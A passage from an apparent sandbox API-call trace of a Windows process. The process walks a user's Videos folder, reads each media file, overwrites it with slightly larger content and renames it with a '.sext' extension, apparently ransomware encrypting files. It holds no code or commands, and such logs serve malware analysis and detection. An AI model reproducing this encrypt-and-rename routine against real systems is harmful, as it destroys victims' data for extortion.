ftCreationTime.dwLowDateTime=0x432d8840, ftCreationTime.dwHighDateTime=0x1d5e16d, ftLastAccessTime.dwLowDateTime=0xc1ed3880, ftLastAccessTime.dwHighDateTime=0x1d5e012, ftLastWriteTime.dwLowDateTime=0x8b52b700, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x15f30)) returned 1 [0102.370] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e420) returned 1 [0102.370] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\DaO3.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\dao3.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\DaO3.avi.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\dao3.avi.sext")) returned 1 [0102.371] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\DbuW7 AVRfVZ4Mwz.avi", nBufferLength=0x105, lpBuffer=0x12de80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\DbuW7 AVRfVZ4Mwz.avi", lpFilePart=0x0) returned 0x4f [0102.371] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e360) returned 1 [0102.371] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\DbuW7 AVRfVZ4Mwz.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\dbuw7 avrfvz4mwz.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0102.371] GetFileType (hFile=0x2e4) returned 0x1 [0102.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e2d0) returned 1 [0102.371] GetFileType (hFile=0x2e4) returned 0x1 [0102.371] GetFileSize (in: hFile=0x2e4, lpFileSizeHigh=0x12e4f8 | out: lpFileSizeHigh=0x12e4f8*=0x0) returned 0xee81 [0102.418] ReadFile (in: hFile=0x2e4, lpBuffer=0x23d9e60, nNumberOfBytesToRead=0xee81, lpNumberOfBytesRead=0x12e428, lpOverlapped=0x0 | out: lpBuffer=0x23d9e60*, lpNumberOfBytesRead=0x12e428*=0xee81, lpOverlapped=0x0) returned 1 [0102.419] CloseHandle (hObject=0x2e4) returned 1 [0102.543] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\DbuW7 AVRfVZ4Mwz.avi", nBufferLength=0x105, lpBuffer=0x12de80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\DbuW7 AVRfVZ4Mwz.avi", lpFilePart=0x0) returned 0x4f [0102.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e360) returned 1 [0102.543] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\DbuW7 AVRfVZ4Mwz.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\dbuw7 avrfvz4mwz.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0102.544] GetFileType (hFile=0x2e4) returned 0x1 [0102.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e2d0) returned 1 [0102.544] GetFileType (hFile=0x2e4) returned 0x1 [0102.544] WriteFile (in: hFile=0x2e4, lpBuffer=0x2300e00*, nNumberOfBytesToWrite=0xee90, lpNumberOfBytesWritten=0x12e488, lpOverlapped=0x0 | out: lpBuffer=0x2300e00*, lpNumberOfBytesWritten=0x12e488*=0xee90, lpOverlapped=0x0) returned 1 [0102.546] CloseHandle (hObject=0x2e4) returned 1 [0102.548] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\DbuW7 AVRfVZ4Mwz.avi", nBufferLength=0x105, lpBuffer=0x12e020, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\DbuW7 AVRfVZ4Mwz.avi", lpFilePart=0x0) returned 0x4f [0102.548] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\DbuW7 AVRfVZ4Mwz.avi.sext", nBufferLength=0x105, lpBuffer=0x12e020, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\DbuW7 AVRfVZ4Mwz.avi.sext", lpFilePart=0x0) returned 0x54 [0102.549] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e460) returned 1 [0102.549] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\DbuW7 AVRfVZ4Mwz.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\dbuw7 avrfvz4mwz.avi"), fInfoLevelId=0x0, lpFileInformation=0x12e540 | out: lpFileInformation=0x12e540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0797800, ftCreationTime.dwHighDateTime=0x1d5e3f4, ftLastAccessTime.dwLowDateTime=0xb676bf30, ftLastAccessTime.dwHighDateTime=0x1d5e7b5, ftLastWriteTime.dwLowDateTime=0x8b6f4780, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0xee90)) returned 1 [0102.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e420) returned 1 [0102.549] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\DbuW7 AVRfVZ4Mwz.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\dbuw7 avrfvz4mwz.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\DbuW7 AVRfVZ4Mwz.avi.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\dbuw7 avrfvz4mwz.avi.sext")) returned 1 [0102.550] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\llL2AYEdzakX1Dxgfa.swf", nBufferLength=0x105, lpBuffer=0x12de80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\llL2AYEdzakX1Dxgfa.swf", lpFilePart=0x0) returned 0x51 [0102.550] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e360) returned 1 [0102.550] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\llL2AYEdzakX1Dxgfa.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\lll2ayedzakx1dxgfa.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0102.550] GetFileType (hFile=0x2e4) returned 0x1 [0102.550] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e2d0) returned 1 [0102.550] GetFileType (hFile=0x2e4) returned 0x1 [0102.550] GetFileSize (in: hFile=0x2e4, lpFileSizeHigh=0x12e4f8 | out: lpFileSizeHigh=0x12e4f8*=0x0) returned 0x6d95 [0102.550] ReadFile (in: hFile=0x2e4, lpBuffer=0x2310230, nNumberOfBytesToRead=0x6d95, lpNumberOfBytesRead=0x12e428, lpOverlapped=0x0 | out: lpBuffer=0x2310230*, lpNumberOfBytesRead=0x12e428*=0x6d95, lpOverlapped=0x0) returned 1 [0102.551] CloseHandle (hObject=0x2e4) returned 1 [0102.627] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\llL2AYEdzakX1Dxgfa.swf", nBufferLength=0x105, lpBuffer=0x12de80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\llL2AYEdzakX1Dxgfa.swf", lpFilePart=0x0) returned 0x51 [0102.627] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e360) returned 1 [0102.627] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\llL2AYEdzakX1Dxgfa.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\lll2ayedzakx1dxgfa.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0102.629] GetFileType (hFile=0x2e4) returned 0x1 [0102.629] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e2d0) returned 1 [0102.629] GetFileType (hFile=0x2e4) returned 0x1 [0102.629] WriteFile (in: hFile=0x2e4, lpBuffer=0x241de20*, nNumberOfBytesToWrite=0x6da0, lpNumberOfBytesWritten=0x12e488, lpOverlapped=0x0 | out: lpBuffer=0x241de20*, lpNumberOfBytesWritten=0x12e488*=0x6da0, lpOverlapped=0x0) returned 1 [0102.630] CloseHandle (hObject=0x2e4) returned 1 [0102.632] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\llL2AYEdzakX1Dxgfa.swf", nBufferLength=0x105, lpBuffer=0x12e020, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\llL2AYEdzakX1Dxgfa.swf", lpFilePart=0x0) returned 0x51 [0102.633] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\llL2AYEdzakX1Dxgfa.swf.sext", nBufferLength=0x105, lpBuffer=0x12e020, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\llL2AYEdzakX1Dxgfa.swf.sext", lpFilePart=0x0) returned 0x56 [0102.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e460) returned 1 [0102.633] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\llL2AYEdzakX1Dxgfa.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\lll2ayedzakx1dxgfa.swf"), fInfoLevelId=0x0, lpFileInformation=0x12e540 | out: lpFileInformation=0x12e540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51580be0, ftCreationTime.dwHighDateTime=0x1d5e6ed, ftLastAccessTime.dwLowDateTime=0x39ee5b30, ftLastAccessTime.dwHighDateTime=0x1d5d9c3, ftLastWriteTime.dwLowDateTime=0x8b7b2e60, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x6da0)) returned 1 [0102.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e420) returned 1 [0102.633] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\llL2AYEdzakX1Dxgfa.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\lll2ayedzakx1dxgfa.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\llL2AYEdzakX1Dxgfa.swf.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\lll2ayedzakx1dxgfa.swf.sext")) returned 1 [0102.634] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e430) returned 1 [0102.634] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i", nBufferLength=0x105, lpBuffer=0x12df20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i", lpFilePart=0x0) returned 0x40 [0102.634] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\", nBufferLength=0x105, lpBuffer=0x12dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\", lpFilePart=0x0) returned 0x41 [0102.634] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\*", lpFindFileData=0x12e0d0 | out: lpFindFileData=0x12e0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf15ef450, ftCreationTime.dwHighDateTime=0x1d5e7b0, ftLastAccessTime.dwLowDateTime=0xbeaeb960, ftLastAccessTime.dwHighDateTime=0x1d5dc6f, ftLastWriteTime.dwLowDateTime=0xbeaeb960, ftLastWriteTime.dwHighDateTime=0x1d5dc6f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xae39b0 [0102.634] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e120 | out: lpFindFileData=0x12e120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf15ef450, ftCreationTime.dwHighDateTime=0x1d5e7b0, ftLastAccessTime.dwLowDateTime=0xbeaeb960, ftLastAccessTime.dwHighDateTime=0x1d5dc6f, ftLastWriteTime.dwLowDateTime=0xbeaeb960, ftLastWriteTime.dwHighDateTime=0x1d5dc6f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.635] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e120 | out: lpFindFileData=0x12e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4723aff0, ftCreationTime.dwHighDateTime=0x1d5e452, ftLastAccessTime.dwLowDateTime=0x446dd5f0, ftLastAccessTime.dwHighDateTime=0x1d5d8a5, ftLastWriteTime.dwLowDateTime=0x446dd5f0, ftLastWriteTime.dwHighDateTime=0x1d5d8a5, nFileSizeHigh=0x0, nFileSizeLow=0xc755, dwReserved0=0x0, dwReserved1=0x0, cFileName="6NJiby wnlgY.swf", cAlternateFileName="6NJIBY~1.SWF")) returned 1 [0102.635] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e120 | out: lpFindFileData=0x12e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d3c640, ftCreationTime.dwHighDateTime=0x1d5de53, ftLastAccessTime.dwLowDateTime=0x69c97cf0, ftLastAccessTime.dwHighDateTime=0x1d5dd8c, ftLastWriteTime.dwLowDateTime=0x69c97cf0, ftLastWriteTime.dwHighDateTime=0x1d5dd8c, nFileSizeHigh=0x0, nFileSizeLow=0xc824, dwReserved0=0x0, dwReserved1=0x0, cFileName="dgJ1Cu86r I.flv", cAlternateFileName="DGJ1CU~1.FLV")) returned 1 [0102.635] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e120 | out: lpFindFileData=0x12e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56c43620, ftCreationTime.dwHighDateTime=0x1d5ddbb, ftLastAccessTime.dwLowDateTime=0xeb35be70, ftLastAccessTime.dwHighDateTime=0x1d5e467, ftLastWriteTime.dwLowDateTime=0xeb35be70, ftLastWriteTime.dwHighDateTime=0x1d5e467, nFileSizeHigh=0x0, nFileSizeLow=0x14033, dwReserved0=0x0, dwReserved1=0x0, cFileName="f_OYDk.flv", cAlternateFileName="")) returned 1 [0102.635] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e120 | out: lpFindFileData=0x12e120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99642900, ftCreationTime.dwHighDateTime=0x1d5e102, ftLastAccessTime.dwLowDateTime=0x5e8f8d80, ftLastAccessTime.dwHighDateTime=0x1d5e4d9, ftLastWriteTime.dwLowDateTime=0x5e8f8d80, ftLastWriteTime.dwHighDateTime=0x1d5e4d9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VGiiaMPiZ", cAlternateFileName="VGIIAM~1")) returned 1 [0102.635] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e120 | out: lpFindFileData=0x12e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa98e0370, ftCreationTime.dwHighDateTime=0x1d5d7fa, ftLastAccessTime.dwLowDateTime=0x39e6690, ftLastAccessTime.dwHighDateTime=0x1d5e7e4, ftLastWriteTime.dwLowDateTime=0x39e6690, ftLastWriteTime.dwHighDateTime=0x1d5e7e4, nFileSizeHigh=0x0, nFileSizeLow=0x735b, dwReserved0=0x0, dwReserved1=0x0, cFileName="_EFlKKu1N1xc5dVxLO.mp4", cAlternateFileName="_EFLKK~1.MP4")) returned 1 [0102.636] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e120 | out: lpFindFileData=0x12e120*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0102.636] FindClose (in: hFindFile=0xae39b0 | out: hFindFile=0xae39b0) returned 1 [0102.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e380) returned 1 [0102.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e340) returned 1 [0102.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e430) returned 1 [0102.636] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i", nBufferLength=0x105, lpBuffer=0x12df20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i", lpFilePart=0x0) returned 0x40 [0102.636] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\", nBufferLength=0x105, lpBuffer=0x12dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\", lpFilePart=0x0) returned 0x41 [0102.636] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\*", lpFindFileData=0x12e0d0 | out: lpFindFileData=0x12e0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf15ef450, ftCreationTime.dwHighDateTime=0x1d5e7b0, ftLastAccessTime.dwLowDateTime=0xbeaeb960, ftLastAccessTime.dwHighDateTime=0x1d5dc6f, ftLastWriteTime.dwLowDateTime=0xbeaeb960, ftLastWriteTime.dwHighDateTime=0x1d5dc6f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xae39b0 [0102.637] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e120 | out: lpFindFileData=0x12e120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf15ef450, ftCreationTime.dwHighDateTime=0x1d5e7b0, ftLastAccessTime.dwLowDateTime=0xbeaeb960, ftLastAccessTime.dwHighDateTime=0x1d5dc6f, ftLastWriteTime.dwLowDateTime=0xbeaeb960, ftLastWriteTime.dwHighDateTime=0x1d5dc6f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.637] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e120 | out: lpFindFileData=0x12e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4723aff0, ftCreationTime.dwHighDateTime=0x1d5e452, ftLastAccessTime.dwLowDateTime=0x446dd5f0, ftLastAccessTime.dwHighDateTime=0x1d5d8a5, ftLastWriteTime.dwLowDateTime=0x446dd5f0, ftLastWriteTime.dwHighDateTime=0x1d5d8a5, nFileSizeHigh=0x0, nFileSizeLow=0xc755, dwReserved0=0x0, dwReserved1=0x0, cFileName="6NJiby wnlgY.swf", cAlternateFileName="6NJIBY~1.SWF")) returned 1 [0102.637] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e120 | out: lpFindFileData=0x12e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d3c640, ftCreationTime.dwHighDateTime=0x1d5de53, ftLastAccessTime.dwLowDateTime=0x69c97cf0, ftLastAccessTime.dwHighDateTime=0x1d5dd8c, ftLastWriteTime.dwLowDateTime=0x69c97cf0, ftLastWriteTime.dwHighDateTime=0x1d5dd8c, nFileSizeHigh=0x0, nFileSizeLow=0xc824, dwReserved0=0x0, dwReserved1=0x0, cFileName="dgJ1Cu86r I.flv", cAlternateFileName="DGJ1CU~1.FLV")) returned 1 [0102.637] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e120 | out: lpFindFileData=0x12e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56c43620, ftCreationTime.dwHighDateTime=0x1d5ddbb, ftLastAccessTime.dwLowDateTime=0xeb35be70, ftLastAccessTime.dwHighDateTime=0x1d5e467, ftLastWriteTime.dwLowDateTime=0xeb35be70, ftLastWriteTime.dwHighDateTime=0x1d5e467, nFileSizeHigh=0x0, nFileSizeLow=0x14033, dwReserved0=0x0, dwReserved1=0x0, cFileName="f_OYDk.flv", cAlternateFileName="")) returned 1 [0102.637] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e120 | out: lpFindFileData=0x12e120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99642900, ftCreationTime.dwHighDateTime=0x1d5e102, ftLastAccessTime.dwLowDateTime=0x5e8f8d80, ftLastAccessTime.dwHighDateTime=0x1d5e4d9, ftLastWriteTime.dwLowDateTime=0x5e8f8d80, ftLastWriteTime.dwHighDateTime=0x1d5e4d9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VGiiaMPiZ", cAlternateFileName="VGIIAM~1")) returned 1 [0102.638] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e120 | out: lpFindFileData=0x12e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa98e0370, ftCreationTime.dwHighDateTime=0x1d5d7fa, ftLastAccessTime.dwLowDateTime=0x39e6690, ftLastAccessTime.dwHighDateTime=0x1d5e7e4, ftLastWriteTime.dwLowDateTime=0x39e6690, ftLastWriteTime.dwHighDateTime=0x1d5e7e4, nFileSizeHigh=0x0, nFileSizeLow=0x735b, dwReserved0=0x0, dwReserved1=0x0, cFileName="_EFlKKu1N1xc5dVxLO.mp4", cAlternateFileName="_EFLKK~1.MP4")) returned 1 [0102.638] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e120 | out: lpFindFileData=0x12e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa98e0370, ftCreationTime.dwHighDateTime=0x1d5d7fa, ftLastAccessTime.dwLowDateTime=0x39e6690, ftLastAccessTime.dwHighDateTime=0x1d5e7e4, ftLastWriteTime.dwLowDateTime=0x39e6690, ftLastWriteTime.dwHighDateTime=0x1d5e7e4, nFileSizeHigh=0x0, nFileSizeLow=0x735b, dwReserved0=0x0, dwReserved1=0x0, cFileName="_EFlKKu1N1xc5dVxLO.mp4", cAlternateFileName="_EFLKK~1.MP4")) returned 0 [0102.638] FindClose (in: hFindFile=0xae39b0 | out: hFindFile=0xae39b0) returned 1 [0102.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e380) returned 1 [0102.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e340) returned 1 [0102.638] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\6NJiby wnlgY.swf", nBufferLength=0x105, lpBuffer=0x12dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\6NJiby wnlgY.swf", lpFilePart=0x0) returned 0x51 [0102.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e270) returned 1 [0102.638] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\6NJiby wnlgY.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\6njiby wnlgy.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0102.639] GetFileType (hFile=0x2e4) returned 0x1 [0102.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e1e0) returned 1 [0102.639] GetFileType (hFile=0x2e4) returned 0x1 [0102.639] GetFileSize (in: hFile=0x2e4, lpFileSizeHigh=0x12e408 | out: lpFileSizeHigh=0x12e408*=0x0) returned 0xc755 [0102.639] ReadFile (in: hFile=0x2e4, lpBuffer=0x2428140, nNumberOfBytesToRead=0xc755, lpNumberOfBytesRead=0x12e338, lpOverlapped=0x0 | out: lpBuffer=0x2428140*, lpNumberOfBytesRead=0x12e338*=0xc755, lpOverlapped=0x0) returned 1 [0102.640] CloseHandle (hObject=0x2e4) returned 1 [0104.194] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\6NJiby wnlgY.swf", nBufferLength=0x105, lpBuffer=0x12dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\6NJiby wnlgY.swf", lpFilePart=0x0) returned 0x51 [0104.194] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e270) returned 1 [0104.195] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\6NJiby wnlgY.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\6njiby wnlgy.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0104.195] GetFileType (hFile=0x2e4) returned 0x1 [0104.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e1e0) returned 1 [0104.195] GetFileType (hFile=0x2e4) returned 0x1 [0104.195] WriteFile (in: hFile=0x2e4, lpBuffer=0x2336940*, nNumberOfBytesToWrite=0xc760, lpNumberOfBytesWritten=0x12e398, lpOverlapped=0x0 | out: lpBuffer=0x2336940*, lpNumberOfBytesWritten=0x12e398*=0xc760, lpOverlapped=0x0) returned 